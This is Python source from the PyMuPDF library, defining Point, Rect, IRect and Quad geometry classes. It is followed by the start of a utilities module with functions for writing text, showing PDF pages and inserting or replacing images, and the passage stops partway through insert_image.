                return (self.y - r.y1) * f
            else:
                return (r.y0 - self.y) * f
        else:
            if self.y >= r.y1:
                return self.distance_to(r.bottom_left, unit)
            elif self.y <= r.y0:
                return self.distance_to(r.top_left, unit)
            else:
                return (r.x0 - self.x) * f

    def __getitem__(self, i):
        return (self.x, self.y)[i]

    def __len__(self):
        return 2

    def __setitem__(self, i, v):
        v = float(v)
        if i == 0: self.x = v
        elif i == 1: self.y = v
        else:
            raise IndexError("index out of range")
        return None

    def __repr__(self):
        return "Point" + str(tuple(self))

    def __pos__(self):
        return Point(self)

    def __neg__(self):
        return Point(-self.x, -self.y)

    def __bool__(self):
        return not (max(self) == min(self) == 0)

    def __nonzero__(self):
        return not (max(self) == min(self) == 0)

    def __eq__(self, p):
        if not hasattr(p, "__len__"):
            return False
        return len(p) == 2 and bool(self - p) is False

    def __abs__(self):
        # Euclidean length of the vector (0, 0) -> (x, y)
        return math.sqrt(self.x * self.x + self.y * self.y)
    norm = __abs__

    def __add__(self, p):
        if hasattr(p, "__float__"):
            return Point(self.x + p, self.y + p)
        if len(p) != 2:
            raise ValueError("Point: bad seq len")
        return Point(self.x + p[0], self.y + p[1])

    def __sub__(self, p):
        if hasattr(p, "__float__"):
            return Point(self.x - p, self.y - p)
        if len(p) != 2:
            raise ValueError("Point: bad seq len")
        return Point(self.x - p[0], self.y - p[1])

    def __mul__(self, m):
        # scalar scales the point, matrix-like transforms a copy
        if hasattr(m, "__float__"):
            return Point(self.x * m, self.y * m)
        p = Point(self)
        return p.transform(m)

    def __truediv__(self, m):
        if hasattr(m, "__float__"):
            return Point(self.x * 1./m, self.y * 1./m)
        m1 = util_invert_matrix(m)[1]
        if not m1:
            raise ZeroDivisionError("matrix not invertible")
        p = Point(self)
        return p.transform(m1)
    __div__ = __truediv__  # Python 2 alias

    def __hash__(self):
        return hash(tuple(self))
class Rect(object):
    """Rect() - all zeros
    Rect(x0, y0, x1, y1) - 4 coordinates
    Rect(top-left, x1, y1) - point and 2 coordinates
    Rect(x0, y0, bottom-right) - 2 coordinates and point
    Rect(top-left, bottom-right) - 2 points
    Rect(sequ) - new from sequence or rect-like
    """
    def __init__(self, *args):
        # argument decoding is delegated to the C helper
        self.x0, self.y0, self.x1, self.y1 = util_make_rect(args)
        return None

    def normalize(self):
        """Replace rectangle with its valid version."""
        if self.x1 < self.x0:
            self.x0, self.x1 = self.x1, self.x0
        if self.y1 < self.y0:
            self.y0, self.y1 = self.y1, self.y0
        return self

    @property
    def is_empty(self):
        """True if rectangle area is empty."""
        return self.x0 >= self.x1 or self.y0 >= self.y1

    @property
    def is_valid(self):
        """True if rectangle is valid."""
        return self.x0 <= self.x1 and self.y0 <= self.y1

    @property
    def is_infinite(self):
        """True if this is the infinite rectangle."""
        return self.x0 == self.y0 == FZ_MIN_INF_RECT and self.x1 == self.y1 == FZ_MAX_INF_RECT

    @property
    def top_left(self):
        """Top-left corner."""
        return Point(self.x0, self.y0)

    @property
    def top_right(self):
        """Top-right corner."""
        return Point(self.x1, self.y0)

    @property
    def bottom_left(self):
        """Bottom-left corner."""
        return Point(self.x0, self.y1)

    @property
    def bottom_right(self):
        """Bottom-right corner."""
        return Point(self.x1, self.y1)
    # short-form aliases for the four corners
    tl = top_left
    tr = top_right
    bl = bottom_left
    br = bottom_right

    @property
    def quad(self):
        """Return Quad version of rectangle."""
        return Quad(self.tl, self.tr, self.bl, self.br)

    def torect(self, r):
        """Return matrix that converts to target rect."""
        r = Rect(r)
        if self.is_infinite or self.is_empty or r.is_infinite or r.is_empty:
            raise ValueError("rectangles must be finite and not empty")
        # shift to origin, scale to target size, shift to target corner
        return (
            Matrix(1, 0, 0, 1, -self.x0, -self.y0)
            * Matrix(r.width / self.width, r.height / self.height)
            * Matrix(1, 0, 0, 1, r.x0, r.y0)
        )

    def morph(self, p, m):
        """Morph with matrix-like m and point-like p.
        Returns a new quad."""
        if self.is_infinite:
            return INFINITE_QUAD()
        return self.quad.morph(p, m)

    def round(self):
        """Return the IRect."""
        return IRect(util_round_rect(self))
    irect = property(round)  # IRect version as a read-only property

    width  = property(lambda self: self.x1 - self.x0 if self.x1 > self.x0 else 0)
    height = property(lambda self: self.y1 - self.y0 if self.y1 > self.y0 else 0)

    def include_point(self, p):
        """Extend to include point-like p."""
        if len(p) != 2:
            raise ValueError("Point: bad seq len")
        self.x0, self.y0, self.x1, self.y1 = util_include_point_in_rect(self, p)
        return self

    def include_rect(self, r):
        """Extend to include rect-like r."""
        if len(r) != 4:
            raise ValueError("Rect: bad seq len")
        r = Rect(r)
        if r.is_infinite or self.is_infinite:
            # union with an infinite rect is the infinite rect
            self.x0, self.y0, self.x1, self.y1 = FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT
        elif r.is_empty:
            return self
        elif self.is_empty:
            self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
        else:
            self.x0, self.y0, self.x1, self.y1 = util_union_rect(self, r)
        return self

    def intersect(self, r):
        """Restrict to common rect with rect-like r."""
        if not len(r) == 4:
            raise ValueError("Rect: bad seq len")
        r = Rect(r)
        if r.is_infinite:
            return self
        elif self.is_infinite:
            self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
        elif r.is_empty:
            # intersecting with an empty rect copies that empty rect
            self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
        elif self.is_empty:
            return self
        else:
            self.x0, self.y0, self.x1, self.y1 = util_intersect_rect(self, r)
        return self

    def contains(self, x):
        """Check if containing point-like or rect-like x."""
        return self.__contains__(x)

    def transform(self, m):
        """Replace with the transformation by matrix-like m."""
        if not len(m) == 6:
            raise ValueError("Matrix: bad seq len")
        self.x0, self.y0, self.x1, self.y1 = util_transform_rect(self, m)
        return self

    def __getitem__(self, i):
        return (self.x0, self.y0, self.x1, self.y1)[i]

    def __len__(self):
        return 4

    def __setitem__(self, i, v):
        v = float(v)
        if   i == 0: self.x0 = v
        elif i == 1: self.y0 = v
        elif i == 2: self.x1 = v
        elif i == 3: self.y1 = v
        else:
            raise IndexError("index out of range")
        return None

    def __repr__(self):
        return "Rect" + str(tuple(self))

    def __pos__(self):
        return Rect(self)

    def __neg__(self):
        return Rect(-self.x0, -self.y0, -self.x1, -self.y1)

    def __bool__(self):
        return not self.x0 == self.y0 == self.x1 == self.y1 == 0

    def __nonzero__(self):
        return not self.x0 == self.y0 == self.x1 == self.y1 == 0

    def __eq__(self, r):
        if not hasattr(r, "__len__"):
            return False
        return len(r) == 4 and self.x0 == r[0] and self.y0 == r[1] and self.x1 == r[2] and self.y1 == r[3]

    def __abs__(self):
        # area; 0 for infinite or invalid rectangles
        if self.is_infinite or not self.is_valid:
            return 0.0
        return self.width * self.height

    def norm(self):
        # Euclidean norm of the four coordinates (a method here, unlike
        # Point/Matrix where 'norm' aliases __abs__)
        return math.sqrt(sum([c*c for c in self]))

    def __add__(self, p):
        if hasattr(p, "__float__"):
            return Rect(self.x0 + p, self.y0 + p, self.x1 + p, self.y1 + p)
        if len(p) != 4:
            raise ValueError("Rect: bad seq len")
        return Rect(self.x0 + p[0], self.y0 + p[1], self.x1 + p[2], self.y1 + p[3])

    def __sub__(self, p):
        if hasattr(p, "__float__"):
            return Rect(self.x0 - p, self.y0 - p, self.x1 - p, self.y1 - p)
        if len(p) != 4:
            raise ValueError("Rect: bad seq len")
        return Rect(self.x0 - p[0], self.y0 - p[1], self.x1 - p[2], self.y1 - p[3])

    def __mul__(self, m):
        if hasattr(m, "__float__"):
            return Rect(self.x0 * m, self.y0 * m, self.x1 * m, self.y1 * m)
        r = Rect(self)
        r = r.transform(m)
        return r

    def __truediv__(self, m):
        if hasattr(m, "__float__"):
            return Rect(self.x0 * 1./m, self.y0 * 1./m, self.x1 * 1./m, self.y1 * 1./m)
        im = util_invert_matrix(m)[1]
        if not im:
            raise ZeroDivisionError("Matrix not invertible")
        r = Rect(self)
        r = r.transform(im)
        return r
    __div__ = __truediv__  # Python 2 alias

    def __contains__(self, x):
        if hasattr(x, "__float__"):
            # scalar: membership among the four coordinates
            return x in tuple(self)
        l = len(x)
        if l == 2:
            return util_is_point_in_rect(x, self)
        if l == 4:
            # try rect-like first, fall back to quad-like
            r = INFINITE_RECT()
            try:
                r = Rect(x)
            except:
                r = Quad(x).rect
            return (self.x0 <= r.x0 <= r.x1 <= self.x1 and
                    self.y0 <= r.y0 <= r.y1 <= self.y1)
        return False

    def __or__(self, x):
        if not hasattr(x, "__len__"):
            raise ValueError("bad type op 2")
        r = Rect(self)
        if len(x) == 2:
            return r.include_point(x)
        if len(x) == 4:
            return r.include_rect(x)
        raise ValueError("bad type op 2")

    def __and__(self, x):
        if not hasattr(x, "__len__") or len(x) != 4:
            raise ValueError("bad type op 2")
        r = Rect(self)
        return r.intersect(x)

    def intersects(self, x):
        """Check if intersection with rectangle x is not empty."""
        r1 = Rect(x)
        if self.is_empty or self.is_infinite or r1.is_empty or r1.is_infinite:
            return False
        r = Rect(self)
        if r.intersect(r1).is_empty:
            return False
        return True

    def __hash__(self):
        return hash(tuple(self))
class IRect(object):
    """IRect() - all zeros
    IRect(x0, y0, x1, y1) - 4 coordinates
    IRect(top-left, x1, y1) - point and 2 coordinates
    IRect(x0, y0, bottom-right) - 2 coordinates and point
    IRect(top-left, bottom-right) - 2 points
    IRect(sequ) - new from sequence or rect-like
    """
    # NOTE: IRect is intentionally NOT a Rect subclass; arithmetic and set
    # operations below call the *unbound* Rect methods with an IRect self,
    # which works because IRect is rect-like (duck typing), and round the
    # float result back to an IRect.
    def __init__(self, *args):
        self.x0, self.y0, self.x1, self.y1 = util_make_irect(args)
        return None

    def normalize(self):
        """Replace rectangle with its valid version."""
        if self.x1 < self.x0:
            self.x0, self.x1 = self.x1, self.x0
        if self.y1 < self.y0:
            self.y0, self.y1 = self.y1, self.y0
        return self

    @property
    def is_empty(self):
        """True if rectangle area is empty."""
        return self.x0 >= self.x1 or self.y0 >= self.y1

    @property
    def is_valid(self):
        """True if rectangle is valid."""
        return self.x0 <= self.x1 and self.y0 <= self.y1

    @property
    def is_infinite(self):
        """True if rectangle is infinite."""
        return self.x0 == self.y0 == FZ_MIN_INF_RECT and self.x1 == self.y1 == FZ_MAX_INF_RECT

    @property
    def top_left(self):
        """Top-left corner."""
        return Point(self.x0, self.y0)

    @property
    def top_right(self):
        """Top-right corner."""
        return Point(self.x1, self.y0)

    @property
    def bottom_left(self):
        """Bottom-left corner."""
        return Point(self.x0, self.y1)

    @property
    def bottom_right(self):
        """Bottom-right corner."""
        return Point(self.x1, self.y1)
    # short-form aliases for the four corners
    tl = top_left
    tr = top_right
    bl = bottom_left
    br = bottom_right

    @property
    def quad(self):
        """Return Quad version of rectangle."""
        return Quad(self.tl, self.tr, self.bl, self.br)

    def torect(self, r):
        """Return matrix that converts to target rect."""
        r = Rect(r)
        if self.is_infinite or self.is_empty or r.is_infinite or r.is_empty:
            raise ValueError("rectangles must be finite and not empty")
        return (
            Matrix(1, 0, 0, 1, -self.x0, -self.y0)
            * Matrix(r.width / self.width, r.height / self.height)
            * Matrix(1, 0, 0, 1, r.x0, r.y0)
        )

    def morph(self, p, m):
        """Morph with matrix-like m and point-like p.
        Returns a new quad."""
        if self.is_infinite:
            return INFINITE_QUAD()
        return self.quad.morph(p, m)

    @property
    def rect(self):
        # float (Rect) version of this rectangle
        return Rect(self)

    width  = property(lambda self: self.x1 - self.x0 if self.x1 > self.x0 else 0)
    height = property(lambda self: self.y1 - self.y0 if self.y1 > self.y0 else 0)

    def include_point(self, p):
        """Extend rectangle to include point p."""
        rect = self.rect.include_point(p)
        return rect.irect

    def include_rect(self, r):
        """Extend rectangle to include rectangle r."""
        rect = self.rect.include_rect(r)
        return rect.irect

    def intersect(self, r):
        """Restrict rectangle to intersection with rectangle r."""
        rect = self.rect.intersect(r)
        return rect.irect

    def __getitem__(self, i):
        return (self.x0, self.y0, self.x1, self.y1)[i]

    def __len__(self):
        return 4

    def __setitem__(self, i, v):
        v = int(v)  # coordinates are integers here
        if   i == 0: self.x0 = v
        elif i == 1: self.y0 = v
        elif i == 2: self.x1 = v
        elif i == 3: self.y1 = v
        else:
            raise IndexError("index out of range")
        return None

    def __repr__(self):
        return "IRect" + str(tuple(self))

    def __pos__(self):
        return IRect(self)

    def __neg__(self):
        return IRect(-self.x0, -self.y0, -self.x1, -self.y1)

    def __bool__(self):
        return not self.x0 == self.y0 == self.x1 == self.y1 == 0

    def __nonzero__(self):
        return not self.x0 == self.y0 == self.x1 == self.y1 == 0

    def __eq__(self, r):
        if not hasattr(r, "__len__"):
            return False
        return len(r) == 4 and self.x0 == r[0] and self.y0 == r[1] and self.x1 == r[2] and self.y1 == r[3]

    def __abs__(self):
        if self.is_infinite or not self.is_valid:
            return 0
        return self.width * self.height

    def norm(self):
        return math.sqrt(sum([c*c for c in self]))

    # the following delegate to Rect's implementation and round the result
    def __add__(self, p):
        return Rect.__add__(self, p).round()

    def __sub__(self, p):
        return Rect.__sub__(self, p).round()

    def transform(self, m):
        return Rect.transform(self, m).round()

    def __mul__(self, m):
        return Rect.__mul__(self, m).round()

    def __truediv__(self, m):
        return Rect.__truediv__(self, m).round()
    __div__ = __truediv__  # Python 2 alias

    def __contains__(self, x):
        return Rect.__contains__(self, x)

    def __or__(self, x):
        return Rect.__or__(self, x).round()

    def __and__(self, x):
        return Rect.__and__(self, x).round()

    def intersects(self, x):
        return Rect.intersects(self, x)

    def __hash__(self):
        return hash(tuple(self))
class Quad(object):
    """Quad() - all zero points\nQuad(ul, ur, ll, lr)\nQuad(quad) - new copy\nQuad(sequence) - from 'sequence'"""
    def __init__(self, *args):
        if not args:
            self.ul = self.ur = self.ll = self.lr = Point()
            return None
        if len(args) > 4:
            raise ValueError("Quad: bad seq len")
        if len(args) == 4:  # four point-likes
            self.ul, self.ur, self.ll, self.lr = map(Point, args)
            return None
        if len(args) == 1:  # a quad-like sequence
            l = args[0]
            if hasattr(l, "__getitem__") is False:
                raise ValueError("Quad: bad args")
            if len(l) != 4:
                raise ValueError("Quad: bad seq len")
            self.ul, self.ur, self.ll, self.lr = map(Point, l)
            return None
        raise ValueError("Quad: bad args")

    @property
    def is_rectangular(self) -> bool:
        """Check if quad is rectangular.

        Notes:
            Some rotation matrix can thus transform it into a rectangle.
            This is equivalent to three corners enclose 90 degrees.
        Returns:
            True or False.
        """
        sine = util_sine_between(self.ul, self.ur, self.lr)
        if abs(sine - 1) > EPSILON:  # the sine of the angle
            return False

        sine = util_sine_between(self.ur, self.lr, self.ll)
        if abs(sine - 1) > EPSILON:
            return False

        sine = util_sine_between(self.lr, self.ll, self.ul)
        if abs(sine - 1) > EPSILON:
            return False

        return True

    @property
    def is_convex(self) -> bool:
        """Check if quad is convex and not degenerate.

        Notes:
            Check that for the two diagonals, the other two corners are not
            on the same side of the diagonal.
        Returns:
            True or False.
        """
        m = planish_line(self.ul, self.lr)  # puts this diagonal on x-axis
        p1 = self.ll * m  # transform the
        p2 = self.ur * m  # other two points
        if p1.y * p2.y > 0:
            return False
        m = planish_line(self.ll, self.ur)  # puts other diagonal on x-axis
        p1 = self.lr * m  # tranform the
        p2 = self.ul * m  # remaining points
        if p1.y * p2.y > 0:
            return False
        return True

    width  = property(lambda self: max(abs(self.ul - self.ur), abs(self.ll - self.lr)))
    height = property(lambda self: max(abs(self.ul - self.ll), abs(self.ur - self.lr)))

    @property
    def is_empty(self):
        """Check whether all quad corners are on the same line.

        This is the case if width or height is zero.
        """
        return self.width < EPSILON or self.height < EPSILON

    @property
    def is_infinite(self):
        """Check whether this is the infinite quad."""
        return self.rect.is_infinite

    @property
    def rect(self):
        """Smallest rectangle containing the quad (envelope)."""
        r = Rect()
        r.x0 = min(self.ul.x, self.ur.x, self.lr.x, self.ll.x)
        r.y0 = min(self.ul.y, self.ur.y, self.lr.y, self.ll.y)
        r.x1 = max(self.ul.x, self.ur.x, self.lr.x, self.ll.x)
        r.y1 = max(self.ul.y, self.ur.y, self.lr.y, self.ll.y)
        return r

    def __contains__(self, x):
        try:
            l = x.__len__()
        except:
            return False
        if l == 2:  # point-like
            return util_point_in_quad(x, self)
        if l != 4:
            return False
        if CheckRect(x):  # rect-like: check top-left and bottom-right
            if Rect(x).is_empty:
                return True
            return util_point_in_quad(x[:2], self) and util_point_in_quad(x[2:], self)
        if CheckQuad(x):  # quad-like: check all four corners
            for i in range(4):
                if not util_point_in_quad(x[i], self):
                    return False
            return True
        return False

    def __getitem__(self, i):
        return (self.ul, self.ur, self.ll, self.lr)[i]

    def __len__(self):
        return 4

    def __setitem__(self, i, v):
        if   i == 0: self.ul = Point(v)
        elif i == 1: self.ur = Point(v)
        elif i == 2: self.ll = Point(v)
        elif i == 3: self.lr = Point(v)
        else:
            raise IndexError("index out of range")
        return None

    def __repr__(self):
        return "Quad" + str(tuple(self))

    def __pos__(self):
        return Quad(self)

    def __neg__(self):
        return Quad(-self.ul, -self.ur, -self.ll, -self.lr)

    def __bool__(self):
        return not self.is_empty

    def __nonzero__(self):
        return not self.is_empty

    def __eq__(self, quad):
        if not hasattr(quad, "__len__"):
            return False
        return len(quad) == 4 and (
            self.ul == quad[0] and
            self.ur == quad[1] and
            self.ll == quad[2] and
            self.lr == quad[3]
        )

    def __abs__(self):
        # area of the quad (width of top edge times height of left edge)
        if self.is_empty:
            return 0.0
        return abs(self.ul - self.ur) * abs(self.ul - self.ll)

    def morph(self, p, m):
        """Morph the quad with matrix-like 'm' and point-like 'p'.

        Return a new quad."""
        if self.is_infinite:
            return INFINITE_QUAD()
        delta = Matrix(1, 1).pretranslate(p.x, p.y)
        q = self * ~delta * m * delta  # rotate/shear around the pivot point
        return q

    def transform(self, m):
        """Replace quad by its transformation with matrix m."""
        if hasattr(m, "__float__"):
            pass  # scalars scale each corner point
        elif len(m) != 6:
            raise ValueError("Matrix: bad seq len")
        self.ul *= m
        self.ur *= m
        self.ll *= m
        self.lr *= m
        return self

    def __mul__(self, m):
        q = Quad(self)
        q = q.transform(m)
        return q

    def __add__(self, q):
        """Add a number or a quad-like (four point-likes) corner-wise."""
        if hasattr(q, "__float__"):
            return Quad(self.ul + q, self.ur + q, self.ll + q, self.lr + q)
        # BUGFIX: this previously checked 'len(p)' - an undefined name,
        # raising NameError for any sequence operand.
        if len(q) != 4:
            raise ValueError("Quad: bad seq len")
        return Quad(self.ul + q[0], self.ur + q[1], self.ll + q[2], self.lr + q[3])

    def __sub__(self, q):
        """Subtract a number or a quad-like (four point-likes) corner-wise."""
        if hasattr(q, "__float__"):
            return Quad(self.ul - q, self.ur - q, self.ll - q, self.lr - q)
        # BUGFIX: same undefined 'len(p)' check as in __add__.
        if len(q) != 4:
            raise ValueError("Quad: bad seq len")
        return Quad(self.ul - q[0], self.ur - q[1], self.ll - q[2], self.lr - q[3])

    def __truediv__(self, m):
        if hasattr(m, "__float__"):
            im = 1. / m
        else:
            im = util_invert_matrix(m)[1]
            if not im:
                raise ZeroDivisionError("Matrix not invertible")
        q = Quad(self)
        q = q.transform(im)
        return q
    __div__ = __truediv__  # Python 2 alias

    def __hash__(self):
        return hash(tuple(self))
# some special geometry objects
# These are factory functions (not constants) so each call returns a fresh,
# independently mutable object.
def EMPTY_RECT():
    """Return a new 'empty' Rect (top-left beyond bottom-right)."""
    return Rect(FZ_MAX_INF_RECT, FZ_MAX_INF_RECT, FZ_MIN_INF_RECT, FZ_MIN_INF_RECT)

def INFINITE_RECT():
    """Return a new infinite Rect."""
    return Rect(FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT)

def EMPTY_IRECT():
    """Return a new 'empty' IRect."""
    return IRect(FZ_MAX_INF_RECT, FZ_MAX_INF_RECT, FZ_MIN_INF_RECT, FZ_MIN_INF_RECT)

def INFINITE_IRECT():
    """Return a new infinite IRect."""
    return IRect(FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT)

def INFINITE_QUAD():
    """Return a new infinite Quad."""
    return INFINITE_RECT().quad

def EMPTY_QUAD():
    """Return a new 'empty' Quad."""
    return EMPTY_RECT().quad
%}
| 34,379 | Python | .py | 936 | 27.498932 | 115 | 0.521192 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,379 | utils.py | pymupdf_PyMuPDF/src_classic/utils.py | # ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
import io
import json
import math
import os
import random
import string
import tempfile
import typing
import warnings
from fitz_old import *
TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
point_like = "point_like"
rect_like = "rect_like"
matrix_like = "matrix_like"
quad_like = "quad_like"
AnyType = typing.Any
OptInt = typing.Union[int, None]
OptFloat = typing.Optional[float]
OptStr = typing.Optional[str]
OptDict = typing.Optional[dict]
OptBytes = typing.Optional[typing.ByteString]
OptSeq = typing.Optional[typing.Sequence]
"""
This is a collection of functions to extend PyMupdf.
"""
def write_text(page: Page, **kwargs) -> None:
    """Write the text of one or more TextWriter objects.

    Args:
        rect: target rectangle. If None, the union of the text writers is used.
        writers: one or more TextWriter objects.
        overlay: put in foreground or background.
        keep_proportion: maintain aspect ratio of rectangle sides.
        rotate: arbitrary rotation angle.
        oc: the xref of an optional content object
    """
    if type(page) is not Page:
        raise ValueError("bad page parameter")
    allowed = {
        "rect",
        "writers",
        "opacity",
        "color",
        "overlay",
        "keep_proportion",
        "rotate",
        "oc",
    }
    unknown = set(kwargs.keys()) - allowed
    if unknown != set():
        raise ValueError("bad keywords: " + str(unknown))

    rect = kwargs.get("rect")
    writers = kwargs.get("writers")
    opacity = kwargs.get("opacity")
    color = kwargs.get("color")
    overlay = bool(kwargs.get("overlay", True))
    keep_proportion = bool(kwargs.get("keep_proportion", True))
    rotate = int(kwargs.get("rotate", 0))
    oc = int(kwargs.get("oc", 0))

    if not writers:
        raise ValueError("need at least one TextWriter")
    if type(writers) is TextWriter:
        # single writer: fast path when neither rotation nor target rect given
        if rotate == 0 and rect is None:
            writers.write_text(page, opacity=opacity, color=color, overlay=overlay)
            return None
        writers = (writers,)  # normalize to a sequence

    # render all writers onto an interim page of the same size ...
    clip = writers[0].text_rect
    textdoc = Document()
    tpage = textdoc.new_page(width=page.rect.width, height=page.rect.height)
    for writer in writers:
        clip |= writer.text_rect  # track the union of all text rectangles
        writer.write_text(tpage, opacity=opacity, color=color)
    if rect is None:
        rect = clip

    # ... then show that interim page inside the target rectangle
    page.show_pdf_page(
        rect,
        textdoc,
        0,
        overlay=overlay,
        keep_proportion=keep_proportion,
        rotate=rotate,
        clip=clip,
        oc=oc,
    )
    textdoc = None
    tpage = None
def show_pdf_page(*args, **kwargs) -> int:
    """Show page number 'pno' of PDF 'src' in rectangle 'rect'.
    Args:
        rect: (rect-like) where to place the source image
        src: (document) source PDF
        pno: (int) source page number
        overlay: (bool) put in foreground
        keep_proportion: (bool) do not change width-height-ratio
        rotate: (int) degrees (multiple of 90)
        clip: (rect-like) part of source page rectangle
    Returns:
        xref of inserted object (for reuse)
    Raises:
        ValueError: for bad parameters, empty rectangles, or when source
            and target are the same document.
    """
    if len(args) not in (3, 4):
        raise ValueError("bad number of positional parameters")
    pno = None
    if len(args) == 3:
        page, rect, src = args
    else:
        page, rect, src, pno = args
    if pno is None:  # not given positionally: fall back to keyword (default 0)
        pno = int(kwargs.get("pno", 0))
    overlay = bool(kwargs.get("overlay", True))
    keep_proportion = bool(kwargs.get("keep_proportion", True))
    rotate = float(kwargs.get("rotate", 0))
    oc = int(kwargs.get("oc", 0))
    clip = kwargs.get("clip")
    def calc_matrix(sr, tr, keep=True, rotate=0):
        """Calculate transformation matrix from source to target rect.
        Notes:
            The product of four matrices in this sequence: (1) translate correct
            source corner to origin, (2) rotate, (3) scale, (4) translate to
            target's top-left corner.
        Args:
            sr: source rect in PDF (!) coordinate system
            tr: target rect in PDF coordinate system
            keep: whether to keep source ratio of width to height
            rotate: rotation angle in degrees
        Returns:
            Transformation matrix.
        """
        # calc center point of source rect
        smp = (sr.tl + sr.br) / 2.0
        # calc center point of target rect
        tmp = (tr.tl + tr.br) / 2.0
        # m moves to (0, 0), then rotates
        m = Matrix(1, 0, 0, 1, -smp.x, -smp.y) * Matrix(rotate)
        sr1 = sr * m  # resulting source rect to calculate scale factors
        fw = tr.width / sr1.width  # scale the width
        fh = tr.height / sr1.height  # scale the height
        if keep:
            fw = fh = min(fw, fh)  # take min if keeping aspect ratio
        m *= Matrix(fw, fh)  # concat scale matrix
        m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y)  # concat move to target center
        return JM_TUPLE(m)
    CheckParent(page)
    doc = page.parent
    if not doc.is_pdf or not src.is_pdf:
        raise ValueError("is no PDF")
    if rect.is_empty or rect.is_infinite:
        raise ValueError("rect must be finite and not empty")
    while pno < 0:  # support negative page numbers
        pno += src.page_count
    src_page = src[pno]  # load source page
    if src_page.get_contents() == []:
        raise ValueError("nothing to show - source page empty")
    tar_rect = rect * ~page.transformation_matrix  # target rect in PDF coordinates
    src_rect = src_page.rect if not clip else src_page.rect & clip  # source rect
    if src_rect.is_empty or src_rect.is_infinite:
        raise ValueError("clip must be finite and not empty")
    src_rect = src_rect * ~src_page.transformation_matrix  # ... in PDF coord
    matrix = calc_matrix(src_rect, tar_rect, keep=keep_proportion, rotate=rotate)
    # list of existing /Form /XObjects
    ilst = [i[1] for i in doc.get_page_xobjects(page.number)]
    ilst += [i[7] for i in doc.get_page_images(page.number)]
    ilst += [i[4] for i in doc.get_page_fonts(page.number)]
    # create a name not in that list
    n = "fzFrm"
    i = 0
    _imgname = n + "0"
    while _imgname in ilst:
        i += 1
        _imgname = n + str(i)
    isrc = src._graft_id  # used as key for graftmaps
    if doc._graft_id == isrc:
        raise ValueError("source document must not equal target")
    # retrieve / make Graftmap for source PDF (avoids duplicating objects
    # when several pages from the same source are shown)
    gmap = doc.Graftmaps.get(isrc, None)
    if gmap is None:
        gmap = Graftmap(doc)
        doc.Graftmaps[isrc] = gmap
    # take note of generated xref for automatic reuse
    pno_id = (isrc, pno)  # id of src[pno]
    xref = doc.ShownPages.get(pno_id, 0)
    xref = page._show_pdf_page(
        src_page,
        overlay=overlay,
        matrix=matrix,
        xref=xref,
        oc=oc,
        clip=src_rect,
        graftmap=gmap,
        _imgname=_imgname,
    )
    doc.ShownPages[pno_id] = xref
    return xref
def replace_image(page: Page, xref: int, *, filename=None, pixmap=None, stream=None):
    """Replace the image referred to by xref.
    Replace the image by changing the object definition stored under xref. This
    will leave the pages appearance instructions intact, so the new image is
    being displayed with the same bbox, rotation etc.
    By providing a small fully transparent image, an effect as if the image had
    been deleted can be achieved.
    A typical use may include replacing large images by a smaller version,
    e.g. with a lower resolution or graylevel instead of colored.
    Args:
        xref: the xref of the image to replace.
        filename, pixmap, stream: exactly one of these must be provided. The
            meaning being the same as in Page.insert_image.
    Raises:
        ValueError: if xref is not an image, or not exactly one image source
            was supplied.
    """
    doc = page.parent  # the owning document
    if not doc.xref_is_image(xref):
        raise ValueError("xref not an image")  # insert new image anywhere in page
    if bool(filename) + bool(stream) + bool(pixmap) != 1:
        raise ValueError("Exactly one of filename/stream/pixmap must be given")
    # insert the replacement image somewhere on the page, then copy its
    # object definition over the old xref so all references pick it up
    new_xref = page.insert_image(
        page.rect, filename=filename, stream=stream, pixmap=pixmap
    )
    doc.xref_copy(new_xref, xref)  # copy over new to old
    last_contents_xref = page.get_contents()[-1]
    # new image insertion has created a new /Contents source,
    # which we will set to spaces now
    doc.update_stream(last_contents_xref, b" ")
def delete_image(page: Page, xref: int):
    """Delete the image referred to by xef.
    Actually replaces by a small transparent Pixmap using method Page.replace_image.
    Args:
        xref: xref of the image to delete.
    """
    # make a small 100% transparent pixmap (of just any dimension)
    pix = fitz_old.Pixmap(fitz_old.csGRAY, (0, 0, 1, 1), 1)
    pix.clear_with()  # clear all samples bytes to 0x00
    # swapping in the transparent pixmap makes the image invisible while
    # keeping the page's appearance stream intact
    page.replace_image(xref, pixmap=pix)
def insert_image(page, rect, **kwargs):
    """Insert an image for display in a rectangle.
    Args:
        rect: (rect_like) position of image on the page.
        alpha: (int, optional) set to 0 if image has no transparency.
        filename: (str, Path, file object) image filename.
        keep_proportion: (bool) keep width / height ratio (default).
        mask: (bytes, optional) image consisting of alpha values to use.
        oc: (int) xref of OCG or OCMD to declare as Optional Content.
        overlay: (bool) put in foreground (default) or background.
        pixmap: (Pixmap) use this as image.
        rotate: (int) rotate by 0, 90, 180 or 270 degrees.
        stream: (bytes) use this as image.
        xref: (int) use this as image.
    'page' and 'rect' are positional, all other parameters are keywords.
    If 'xref' is given, that image is used. Other input options are ignored.
    Else, exactly one of pixmap, stream or filename must be given.
    'alpha=0' for non-transparent images improves performance significantly.
    Affects stream and filename only.
    Optimum transparent insertions are possible by using filename / stream in
    conjunction with a 'mask' image of alpha values.
    Returns:
        xref (int) of inserted image. Re-use as argument for multiple insertions.
    Raises:
        ValueError: for bad keywords, bad image sources, bad rotation or an
            empty / infinite rectangle.
        FileNotFoundError: when 'filename' does not exist.
    """
    CheckParent(page)
    doc = page.parent
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    # reject unknown keyword arguments early
    valid_keys = {
        "alpha",
        "filename",
        "height",
